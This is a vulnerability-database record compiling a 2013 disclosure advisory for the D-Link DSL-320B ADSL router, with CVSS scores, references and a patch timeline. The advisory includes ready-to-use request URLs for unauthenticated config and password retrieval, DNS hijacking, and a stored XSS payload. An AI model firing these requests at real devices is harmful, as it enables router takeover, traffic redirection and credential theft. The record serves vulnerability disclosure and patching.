ID

VAR-201305-0481


TITLE

D-Link DSL-320B Multiple Authentication Bypass Vulnerabilities

Trust: 0.9

sources: BID: 59659 // CNNVD: CNNVD-201305-118

DESCRIPTION

The D-Link DSL-320B is an ADSL router device. Remote attackers can exploit its vulnerabilities to obtain sensitive information, and its cross-site scripting vulnerabilities can lead to the disclosure of sensitive information or session hijacking. D-Link DSL-320B is a modem product of Taiwan D-Link Corporation. D-Link DSL-320B has an HTML injection vulnerability and multiple information disclosure vulnerabilities. Attackers can use these vulnerabilities to disclose sensitive information; when a user browses an affected website, their browser will execute arbitrary code provided by the attacker in the context of the affected device, and the attacker can steal cookie-based authentication credentials. An HTML-injection vulnerability 2. This may aid in further attacks.

Device: DSL-320B
Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010
Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============

* Access to the Config file without authentication => full authentication bypass possible! :):

(1) 192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

* Access to the logfile without authentication:

(1) 192.168.178.111/status/status_log.sys

* Change the DNS Settings without authentication:

(1) http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

* Stored XSS within parental control (2):

=> Parameter: set/bwlist/entry:1/hostname

Request: http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication. :)

* Login Credentials in HTTP GET are not a good idea => use HTTP Post!

(3) http://192.168.178.111/login.xgi?user=admin&pass=admin1

* Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!:

(3) http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================

Trust: 2.79

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526

IOT TAXONOMY

category: ['IoT', 'Network device']
sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

AFFECTED PRODUCTS

vendor: d link
model: dsl-320b
scope: -
version: -

Trust: 1.2

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

CVSS

SEVERITY

CVSSV2

CVSSV3

CNVD: CNVD-2013-04999
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-05000
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-04999
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2013-05000
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

THREAT TYPE

remote

Trust: 1.2

sources: CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

TYPE

Unknown

Trust: 0.6

sources: BID: 59665 // BID: 59659

PATCH

title: D-Link DSL-320B has multiple patches for verifying bypassed vulnerabilities
url: https://www.cnvd.org.cn/patchinfo/show/33852

Trust: 0.6

sources: CNVD: CNVD-2013-04999

EXTERNAL IDS

db: BID id: 59659

Trust: 1.5

db: BID id: 59665

Trust: 1.5

db: PACKETSTORM id: 121526

Trust: 1.3

db: CNVD id: CNVD-2013-04999

Trust: 0.6

db: CNVD id: CNVD-2013-05000

Trust: 0.6

db: CNNVD id: CNNVD-201305-118

Trust: 0.6

db: CNNVD id: CNNVD-201305-117

Trust: 0.6

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

REFERENCES

url:http://packetstormsecurity.com/files/121526/d-link-dsl-320b-authentication-bypass-cross-site-scripting.html

Trust: 1.2

url:http://www.dlink.com/

Trust: 0.6

url:http://www.securityfocus.com/bid/59659

Trust: 0.6

url:http://www.securityfocus.com/bid/59665

Trust: 0.6

url:http://www.s3cur1ty.de/advisories

Trust: 0.1

url:http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

Trust: 0.1

url:http://192.168.178.111/advanced/adv_dns.xgi?&set/dns/mode=0&set/dns/mode/server/primarydns=1.1.1.1&set/dns/mode/server/secondarydns=2.2.2.2

Trust: 0.1

url:http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3e%3cimg%20src=%220%22%20onerror=alert(1)%3e&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Trust: 0.1

url:http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&cmt=1

Trust: 0.1

url:http://192.168.178.111/login.xgi?user=admin&pass=admin1

Trust: 0.1

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

CREDITS

Michael Messner

Trust: 1.9

sources: BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

SOURCES

db: CNVD id: CNVD-2013-04999
db: CNVD id: CNVD-2013-05000
db: BID id: 59665
db: BID id: 59659
db: PACKETSTORM id: 121526
db: CNNVD id: CNNVD-201305-118
db: CNNVD id: CNNVD-201305-117

LAST UPDATE DATE

2022-05-17T02:07:15.073000+00:00


SOURCES UPDATE DATE

db: CNVD id: CNVD-2013-04999 date: 2013-05-10T00:00:00
db: CNVD id: CNVD-2013-05000 date: 2013-05-10T00:00:00
db: BID id: 59665 date: 2013-05-06T00:00:00
db: BID id: 59659 date: 2013-05-06T00:00:00
db: CNNVD id: CNNVD-201305-118 date: 2013-05-07T00:00:00
db: CNNVD id: CNNVD-201305-117 date: 2013-05-07T00:00:00

SOURCES RELEASE DATE

db: CNVD id: CNVD-2013-04999 date: 2013-05-10T00:00:00
db: CNVD id: CNVD-2013-05000 date: 2013-05-10T00:00:00
db: BID id: 59665 date: 2013-05-06T00:00:00
db: BID id: 59659 date: 2013-05-06T00:00:00
db: PACKETSTORM id: 121526 date: 2013-05-06T15:13:57
db: CNNVD id: CNNVD-201305-118 date: 2013-05-07T00:00:00
db: CNNVD id: CNNVD-201305-117 date: 2013-05-07T00:00:00